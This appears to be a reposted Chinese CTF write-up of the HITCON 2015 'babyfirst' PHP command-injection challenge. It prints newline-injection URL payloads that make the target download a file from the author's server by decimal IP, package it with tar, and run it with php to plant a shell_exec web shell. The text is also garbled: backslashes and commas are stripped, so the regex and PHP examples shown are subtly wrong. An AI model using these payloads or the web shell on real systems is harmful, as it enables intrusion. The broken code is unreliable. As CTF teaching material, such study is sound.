如何巧用vps解题?

admin
admin
admin
145958
文章
119
评论
2025年7月3日03:17:28评论4 views字数 2767阅读9分13秒阅读模式
点击蓝字
如何巧用vps解题?
关注我们

前言

对于Web方向的选手来说,拥有一台vps可以快速解决一些RCE问题,本篇文章所演示的是2015年HITCON的一道web题,虽然时隔有些久,但是这题所利用的trick以及RCE的思路,仍然值得我们去学习。

初步审计

题目代码如下:
<?php
    highlight_file(__FILE__);

    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^w+$/', $args[$i]) )
            exit();
    }
    exec("/bin/orange " . implode(" ", $args));
?>
题目代码比较短,一共就15行代码,但实际上最关键的代码就只有两行,如下:
if ( !preg_match('/^w+$/', $args[$i]) )
exec("/bin/orange " . implode(" ", $args));
一个是正则匹配,一个是exec的命令执行
首先先看正则部分/^w+$/,这一部分要求传入的args参数必须以字母数字下划线开头,除此之外,在最后还有一个美元符号$,需要明确的是:$符号在PCRE中是会匹配n以及r前的位置的,结合后面exec命令执行的部分,也就是说,我们可以使用换行符%0a绕过执行其他命令。
但是如果本题在正则表达式后加一个D修饰符,那么就无法使用%0a绕过,具体测试样例如下,这里就不过多阐述了,因为题目中没有这个修饰符。
echo preg_match("/^w+$/""abc".chr(10));//1
echo preg_match("/^w+$/D""abc".chr(10));//0
其次再粗略看一下命令执行的部分,这里命令执行的部分使用exec,单单使用一个exec是无法将命令执行的结果回显出来,因此在后续做题就可能会产生这么几种思路:数据外带、写入shell等等

数据外带

首先分析一下数据外带,多数情况下想要尝试数据外带都需要使用一些特殊的字符,例如使用反引号外带至dnslog,不过本题正则不允许args传入,因此数据外带这个方法行不通

写入shell

想要使用写入shell方法完成本题,还是有两种方式,一种方式就是使用echo 'xxx' > xx.php,然而这题正则过滤了这些字符,因此可以使用另一种方法,就是将下载远程服务器上的文件,通过一些操作进行RCE

详解RCE

本题官方解所使用的思路就是:下载远程服务器上的文件,通过一些操作进行RCE,具体是哪些操作下面会说到。
首先我们现在本地服务器上测试,此时新建一个php文件,命名为1.php,内容如下:
<?php
echo 3 * 4;
echo "n";
?>
然后将1.php放入一个文件夹a
如何巧用vps解题?
这个时候我们将文件夹a利用tar打包,注意是打包,不是压缩
tar cf b a
将文件夹a打包,并且生成b
打包之后结果如下:
如何巧用vps解题?
此时我们直接使用php命令去执行这个b
如何巧用vps解题?
看一下最后的12,就是前面1.php的执行结果3 * 4 = 12
那么为什么可以直接执行b这个文件呢?
其实我们可以直接使用cat查看b中的文件
如何巧用vps解题?
可以看到,b文件中存在之前写入的1.php的代码
这个时候我们总结一下这个方法,全程使用的命令对于正则/^w+$/都是合法的,并且1.php中的内容可控,因此可以通过这个方法写入shell
因此,对于解题来说,解题流程如下:
首先在vps中新建一个index.html,文件内容如下:
<?php
file_put_contents('shell.php''
    <?php
    header("Content-Type: text/plain");
    print shell_exec($_GET["cmd"]);
    ?>
');
?>
然后在vps中启动http服务
python3 -m http.server 80
由于ip都是6.6.6.6的形式,带.,不符合正则,因此可以使用十进制ip绕过
<?php
echo ip2long("6.6.6.6");
?>
//101058054
然后先新建一个upload目录,对应上面测试的a
?args[]=l%0a&args[]=mkdir&args[]=upload
然后进入upload目录,利用wget下载vps上的index.html
?args[]=l%0a&args[]=cd&args[]=upload%0a&args[]=wget&args[]=101058054
//注意:最后一个args为vps十进制ip值
upload目录打包,打包后的名称为b
?args[]=l%0a&args[]=tar&args[]=cvf&args[]=b&args[]=upload
//将upload目录打包为b
在执行b目录,写入shell
?args[]=l%0a&args[]=php&args[]=b
//执行b,写入shell
这题本质上是利用了tar打包的特性,将下载下来的index.html打包,然后利用php执行
不过这只是官方解,除此之外,在2015年比赛的时候,还有一些队伍使用http302重定向到ftp中,将恶意文件下载到靶机中getshell。
由于Python自带的http.server默认将index.html作为首页,并且无法修改默认首页
但是,还有一种方法就是自建一个web服务器,不使用php解析,且访问80端口的默认文档为shell.php,然后再利用wget下载php文件进行getshell。
总之,方法总比困难多。

参考文章

  • HITCON CTF 2015 Quals Web 出題心得 | WooYun知识库 (xmd5.com)
  • ctf/2015-10-18-hitcon/web_100_babyfirst at master · p4-team/ctf (github.com)

参考文章

CTF中的命令执行,通过该实验掌握通过对字符串进行异或、取反、自增的操作让关键函数不包含字母及数字而执行关键函数的方法。
https://www.hetianlab.com/expc.do?ec=ECID2973-7aed-4d9b-9275-0dc8efc61f57&pk_campaign=weixin-wemedia#stu

原文始发于微信公众号(合天网安实验室):如何巧用vps解题?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月3日03:17:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何巧用vps解题?https://cn-sec.com/archives/800109.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息